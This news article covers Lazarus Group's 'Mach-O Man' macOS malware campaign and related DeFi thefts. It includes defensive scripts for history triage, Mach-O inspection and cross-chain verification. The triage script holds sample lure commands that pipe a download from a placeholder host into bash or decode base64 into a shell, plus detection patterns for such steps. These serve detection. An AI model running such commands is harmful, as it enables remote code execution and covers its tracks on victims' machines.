North Korea’s Lazarus Group Unleashes Sneaky Mac Malware to Steal Crypto Millions!

North Korea’s Lazarus Group targets crypto execs with new macOS malware

North Korean state-linked hackers tracked as the Lazarus Group are using a macOS malware toolkit dubbed “Mach-O Man”, delivered through fake meeting invitations, to harvest credentials and gain access to the accounts of cryptocurrency executives. Researchers tie the same group to nine-figure thefts from DeFi platforms.

Summary

  • CertiK flags “Mach-O Man,” a Lazarus-built macOS toolkit hitting crypto and fintech executives.
  • Campaign uses ClickFix-style fake meeting invites to trick victims into pasting terminal commands.
  • Researchers link Lazarus to over $500 million stolen from Drift and KelpDAO in recent DeFi raids.

CertiK, a blockchain security company, reports that Lazarus, a hacking group believed to be backed by North Korea, is now targeting finance and cryptocurrency executives with new macOS malware. The campaign, called “Mach-O Man”, combines social engineering with tooling that steals cryptocurrency and confidential company data while hiding its presence on the infected machine.

CertiK researchers describe a campaign that tricks victims into copying and pasting malicious commands into the macOS Terminal. The commands are disguised as legitimate “repair” or “verification” steps, often delivered through fake online meeting invitations. Once run, the payload deletes itself from disk, leaving fewer artifacts for investigators.
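The paste-and-run pattern described above leaves traces in shell history and process-execution telemetry even after the payload removes itself. The script below is an added example, not code from CertiK or the article and not a vendor signature: it scores command lines for the traits the campaign is reported to have (a one-liner that fetches a payload, hands it to a shell, and cleans up afterwards). The rule weights, the threshold, the placeholder host name and the sample history are all constructed for this example.

```python
"""Triage shell command lines for ClickFix-style paste-and-run lures on macOS.

Added example: not code from CertiK or the article, and not a vendor signature.
Input is a list of command lines (for instance from ~/.zsh_history or an EDR
process-execution feed). Each line is scored against traits the article
attributes to the campaign: a "repair"/"verification" one-liner that fetches a
payload, hands it to a shell, and cleans up after itself. Rule weights, the
threshold and the sample history below are all constructed for this example.
"""
import re
from dataclasses import dataclass, field

# (name, pattern, weight). Weights are an assumption chosen so that a bare
# curl|sh or base64|sh already crosses the threshold on its own.
RULES = [
    ("fetch_pipe_shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"), 4),
    ("base64_decode_exec", re.compile(r"base64\s+(-d|--decode|-D)[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"), 4),
    ("quarantine_strip", re.compile(r"xattr\s+(-r\s+)?-d\s+com\.apple\.quarantine"), 3),
    ("self_delete", re.compile(r"\brm\s+-r?f\s+(\"?\$0\"?|/tmp/\S+|~/\.\S+)"), 2),
    ("clear_history", re.compile(r"history\s+-c\b|unset\s+HISTFILE\b|HISTFILE=/dev/null"), 2),
    ("osascript_inline", re.compile(r"\bosascript\s+-e\b"), 2),
    ("detach_background", re.compile(r"\bnohup\b|\bdisown\b|&\s*$"), 1),
]
THRESHOLD = 4

ZSH_EXTENDED_PREFIX = re.compile(r"^:\s*\d+:\d+;")  # ": <epoch>:<elapsed>;cmd"


@dataclass
class Finding:
    line_no: int
    score: int
    hits: list = field(default_factory=list)
    command: str = ""


def score_command(cmd: str):
    """Return (score, [rule names that matched]) for one command line."""
    hits = [name for name, rx, _w in RULES if rx.search(cmd)]
    score = sum(w for name, _rx, w in RULES if name in hits)
    return score, hits


def triage(lines):
    """Return a Finding for every line whose score reaches THRESHOLD."""
    findings = []
    for no, raw in enumerate(lines, 1):
        cmd = ZSH_EXTENDED_PREFIX.sub("", raw.strip())
        score, hits = score_command(cmd)
        if score >= THRESHOLD:
            findings.append(Finding(no, score, hits, cmd))
    return findings


# Constructed sample history: two benign lines, two lure-style lines, a plain
# download, and a lone quarantine strip. The host name is a placeholder.
SAMPLE_HISTORY = [
    ": 1713800000:0;git status",
    ": 1713800010:5;brew update && brew upgrade",
    ": 1713800100:0;curl -fsSL https://meeting-fix.example/repair.sh | bash",
    ": 1713800105:0;echo Y3VybCAuLi4= | base64 -d | sh && rm -f /tmp/.p && history -c",
    ": 1713800200:1;curl -O https://example.com/report.csv",
    ": 1713800300:0;xattr -d com.apple.quarantine ~/Downloads/Tool.app",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_HISTORY):
        print(f"line {f.line_no} score={f.score} hits={f.hits}\n    {f.command}")
```

A lone quarantine strip scores below the threshold on purpose, since developers do that routinely; it only contributes when it appears alongside a fetch-and-execute or cleanup step. In practice the history file is often wiped by the lure itself, so the same rules are better run against process-execution events from an EDR or the unified log.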

How the “Mach-O Man” toolkit works

Security firm SOC Prime has attributed the “Mach-O Man” framework to the Lazarus Group, specifically its Famous Chollima unit. The operators spread it by hijacking Telegram accounts and sending fake meeting invitations to crypto and finance companies. According to CoinDesk, the toolkit is made up of several Mach-O binaries that profile the system, establish persistence, and steal usernames, passwords and browser data, with command and control running over Telegram.
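When a responder recovers the Mach-O binaries from a host, the first questions are which architectures they target, what they link against, whether they carry a code signature, and whether the C2 channel is visible in the strings. The script below is an added example, not code from CertiK, SOC Prime or CoinDesk and not derived from any real “Mach-O Man” sample: it parses 64-bit Mach-O headers and load commands, handles universal (fat) binaries, and sweeps for a Telegram Bot API endpoint string. The sample binaries are constructed by the script itself, and the Telegram marker is an assumption drawn from the report that the toolkit is controlled through Telegram.

```python
"""Static triage of Mach-O binaries: architecture, linked dylibs, code-signature
presence and a string sweep for a Telegram Bot API endpoint.

Added example, not code from CertiK, SOC Prime or CoinDesk and not derived from
any real "Mach-O Man" sample. The sample binaries are constructed by this script
so it runs offline; the Telegram marker is an assumption drawn from the report
that the toolkit is controlled through Telegram.
"""
import struct

MH_MAGIC_64, FAT_MAGIC = 0xFEEDFACF, 0xCAFEBABE
CPU_X86_64, CPU_ARM64 = 0x01000007, 0x0100000C
LC_LOAD_DYLIB, LC_CODE_SIGNATURE, LC_MAIN = 0x0C, 0x1D, 0x80000028
TELEGRAM_MARKER = b"api.telegram.org/bot"  # assumption: Bot API C2 embeds this URL fragment
CPU_NAMES = {CPU_X86_64: "x86_64", CPU_ARM64: "arm64"}


def parse_thin(blob):
    """Parse one 64-bit little-endian Mach-O image and summarise its load commands."""
    magic, cputype, _sub, filetype, ncmds, sizeofcmds, _flags, _res = struct.unpack_from("<8I", blob, 0)
    if magic != MH_MAGIC_64:
        raise ValueError("not a 64-bit little-endian Mach-O image")
    off, dylibs, signed = 32, [], False
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack_from("<II", blob, off)
        if cmd == LC_LOAD_DYLIB:
            # dylib_command: after cmd/cmdsize comes the offset of the NUL-terminated name
            name_off = struct.unpack_from("<I", blob, off + 8)[0]
            dylibs.append(blob[off + name_off:off + cmdsize].split(b"\0", 1)[0].decode())
        elif cmd == LC_CODE_SIGNATURE:
            signed = True
        off += cmdsize
    if off != 32 + sizeofcmds:
        raise ValueError("load commands do not match sizeofcmds")
    return {
        "cpu": CPU_NAMES.get(cputype, hex(cputype)),
        "filetype": filetype,
        "dylibs": dylibs,
        "has_code_signature": signed,
        "telegram_c2_marker": TELEGRAM_MARKER in blob,
    }


def parse_macho(blob):
    """Return one summary per architecture slice (fat/universal headers are big-endian)."""
    if struct.unpack_from(">I", blob, 0)[0] == FAT_MAGIC:
        nfat = struct.unpack_from(">I", blob, 4)[0]
        out = []
        for i in range(nfat):
            _cpu, _sub, offset, size, _align = struct.unpack_from(">5I", blob, 8 + 20 * i)
            out.append(parse_thin(blob[offset:offset + size]))
        return out
    return [parse_thin(blob)]


def triage(blob):
    """Human-readable notes a responder would act on."""
    notes = []
    for arch in parse_macho(blob):
        if not arch["has_code_signature"]:
            notes.append(f"{arch['cpu']}: no LC_CODE_SIGNATURE, binary is unsigned")
        if arch["telegram_c2_marker"]:
            notes.append(f"{arch['cpu']}: embeds a Telegram Bot API endpoint string")
    return notes


def build_sample():
    """Constructed arm64 executable: links libSystem, has an entry point, no signature,
    and carries a Telegram Bot API URL in its data. Not a real sample."""
    name = b"/usr/lib/libSystem.B.dylib\0"
    dylib_size = (24 + len(name) + 7) & ~7               # load commands are 8-byte aligned
    dylib = struct.pack("<6I", LC_LOAD_DYLIB, dylib_size, 24, 0, 0x10000, 0x10000)
    dylib += name.ljust(dylib_size - 24, b"\0")
    main = struct.pack("<IIQQ", LC_MAIN, 24, 0x1000, 0)  # entry_point_command
    cmds = dylib + main
    header = struct.pack("<8I", MH_MAGIC_64, CPU_ARM64, 0, 2, 2, len(cmds), 0, 0)  # filetype 2 = MH_EXECUTE
    data = b"\0" * 16 + b"https://api.telegram.org/bot<token>/sendDocument\0"
    return header + cmds + data


def wrap_fat(thin):
    """Wrap a thin image in a one-slice universal binary (slices are page-aligned)."""
    offset = 4096
    hdr = struct.pack(">II", FAT_MAGIC, 1) + struct.pack(">5I", CPU_ARM64, 0, offset, len(thin), 12)
    return hdr.ljust(offset, b"\0") + thin


if __name__ == "__main__":
    for note in triage(wrap_fat(build_sample())):
        print(note)
```

A missing LC_CODE_SIGNATURE is a strong signal on modern macOS, where even ad-hoc signed binaries carry that load command; an unsigned Mach-O dropped by a pasted Terminal command has bypassed Gatekeeper by construction. The string sweep is deliberately crude and will miss an obfuscated endpoint, which is why it sits beside the structural checks rather than replacing them.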

Mandiant, part of Google Cloud, has reported recent attacks on macOS users that combine the ClickFix technique with realistic AI-generated deepfake video, fake Zoom meetings and compromised messaging accounts to talk targets into running commands that install the malware. In one case Mandiant describes, the attackers used a hijacked Telegram account, a fraudulent Zoom call and AI-assisted deception to convince the victim to execute those commands.

DeFi raids fund broader operations

The “Mach-O Man” campaign is tied to a wider Lazarus operation that stole more than $500 million from the DeFi platforms Drift and KelpDAO in a little over two weeks. Those raids combined social engineering of employees at a trading firm with the exploitation of cross-chain vulnerabilities that let the attackers mint roughly 116,500 rsETH and drain about $292 million in assets.

LayerZero, the messaging layer KelpDAO relies on to connect different blockchains, believes the rsETH hack was likely carried out by North Korea’s Lazarus Group. It attributed the loss to a design flaw, a single point of failure in message verification, which allowed the attackers to get a forged cross-chain message accepted as genuine.
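The failure mode LayerZero describes is a general one: if the destination chain accepts a cross-chain message on the word of one verifier, compromising that verifier is enough to mint assets that were never locked on the source side. The toy model below is an added example and the editor’s own, not LayerZero’s code or its real verifier protocol. It shows the same forged “mint” message accepted by a single-verifier endpoint and rejected by a 2-of-3 quorum whose other members refuse to attest to anything absent from the source ledger. Verifier “signatures” are HMAC tags over the message digest, a stand-in for real signatures; the keys, chain names, nonces and messages are all constructed here.

```python
"""Cross-chain message verification: a single trusted verifier versus an
independent quorum.

Added example for the design flaw the article describes (a single point of
failure in message verification). It is the editor's own toy model, not
LayerZero's code or its real verifier protocol. Verifier "signatures" are HMAC
tags over the message digest, a stand-in for real signatures; keys, chain names
and messages are all constructed here.
"""
import hashlib
import hmac
import json
from dataclasses import dataclass


def message_digest(src_chain, dst_chain, nonce, payload):
    """Canonical encoding so source and destination hash identical bytes."""
    body = json.dumps({"src": src_chain, "dst": dst_chain, "nonce": nonce, "payload": payload},
                      sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(body).digest()


class Verifier:
    """Off-chain verifier that attests a digest only if it is committed on the source chain."""

    def __init__(self, name, key, source_ledger):
        self.name, self._key, self._ledger = name, key, source_ledger

    def attest(self, digest):
        if digest not in self._ledger:  # an honest verifier will not sign a message that was never sent
            return None
        return hmac.new(self._key, digest, hashlib.sha256).digest()


@dataclass
class Endpoint:
    """Destination-chain endpoint: accepts a message once `threshold` trusted verifiers attest to it."""
    trusted_keys: dict   # verifier name -> key the endpoint checks against
    threshold: int

    def __post_init__(self):
        self.seen_nonces = set()

    def deliver(self, digest, nonce, attestations):
        if nonce in self.seen_nonces:
            return False, "replay"
        valid = set()
        for name, tag in attestations.items():
            key = self.trusted_keys.get(name)
            if key is None or tag is None:
                continue
            if hmac.compare_digest(hmac.new(key, digest, hashlib.sha256).digest(), tag):
                valid.add(name)
        if len(valid) < self.threshold:
            return False, f"only {len(valid)} of {self.threshold} required attestations"
        self.seen_nonces.add(nonce)
        return True, "accepted"


def simulate():
    """Attacker holds verifier A's key but cannot write to the source chain."""
    ledger = set()  # digests genuinely committed on the source chain
    keys = {"A": b"key-a", "B": b"key-b", "C": b"key-c"}
    verifiers = {n: Verifier(n, k, ledger) for n, k in keys.items()}

    good = message_digest("chain-1", "chain-2", 1, {"action": "mint", "asset": "rsETH", "amount": 100})
    ledger.add(good)
    forged = message_digest("chain-1", "chain-2", 2, {"action": "mint", "asset": "rsETH", "amount": 116500})
    forged_att = {"A": hmac.new(keys["A"], forged, hashlib.sha256).digest()}  # attacker signs with A's key

    single = Endpoint({"A": keys["A"]}, threshold=1)   # the flawed design: one verifier decides
    quorum = Endpoint(dict(keys), threshold=2)         # 2-of-3 independent verifiers

    def all_attest(d):
        return {n: v.attest(d) for n, v in verifiers.items()}

    return {
        "single_good": single.deliver(good, 1, {"A": verifiers["A"].attest(good)})[0],
        "single_forged": single.deliver(forged, 2, forged_att)[0],      # accepted: the single point of failure
        "quorum_good": quorum.deliver(good, 1, all_attest(good))[0],
        "quorum_forged": quorum.deliver(forged, 2, forged_att)[0],      # rejected: B and C never signed it
        "quorum_replay": quorum.deliver(good, 1, all_attest(good))[0],  # rejected: nonce already consumed
        "honest_refuses": verifiers["B"].attest(forged) is None,
    }


if __name__ == "__main__":
    for k, v in simulate().items():
        print(f"{k:15s} {v}")
```

The quorum only helps if its members are operationally independent (different operators, keys and infrastructure); three verifiers run by one team with one compromised build pipeline collapse back into a single point of failure. The nonce check is included because a threshold alone does not stop a legitimately attested message from being replayed.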

According to SecurityWeek, Lazarus has been stealing cryptocurrency for years, taking around $2 billion in virtual assets in 2023 and 2024 alone. The current activity builds on earlier campaigns that used the same ClickFix technique.

After a record-breaking month for DeFi hacks, the market now expects at least another $100 million to be stolen this year. Attacks from groups like Lazarus, believed to be state-backed, have become a regular and significant threat to the crypto industry.


2026-04-22 15:54